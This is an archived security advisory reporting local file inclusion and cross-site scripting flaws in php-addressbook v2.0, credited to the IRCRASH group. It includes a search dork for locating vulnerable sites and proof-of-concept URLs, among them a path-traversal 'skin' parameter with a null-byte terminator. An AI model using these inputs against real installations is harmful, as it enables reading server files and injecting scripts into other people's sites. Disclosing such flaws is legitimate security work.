TUCoPS :: Web :: PHP :: bx3008.htm

php-addressbook v2.0 Multiple Remote Vulnerabilities (LFI/XSS)
php-addressbook v2.0 Multiple Remote Vulnerabilities (LFI/XSS)
php-addressbook v2.0 Multiple Remote Vulnerabilities (LFI/XSS)



----------------------------------------------------------------=0D
Script : php-addressbook v2.0=0D
Type : Multiple Remote Vulnerabilities (LFI/XSS)=0D
----------------------------------------------------------------=0D
Discovered by : IRCRASH (Dr.Crash Or Khashayar Fereidani)=0D
----------------------------------------------------------------=0D
Our Site : Http://IRCRASH.COM=0D 
----------------------------------------------------------------=0D
IRCRASH Team Members : Dr.Crash Or Khashayar Fereidani - Hadi Kiamarsi - Malc0de - R3d.w0rm - Rasool Nasr=0D
----------------------------------------------------------------=0D
DORK : "php-addressbook v2.0 - Refreshed"=0D
----------------------------------------------------------------=0D
#XSS Address : http://Example/pad/?username=" =0D 
----------------------------------------------------------------=0D
#LFI Address : http://Example/pad/index.php?skin=../[FILENAME]$00=0D 
----------------------------------------------------------------=0D
TNx : God......=0D
Khashayar Fereidani Email : irancrash[At]Gmail.com=0D
----------------------------------------------------------------

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH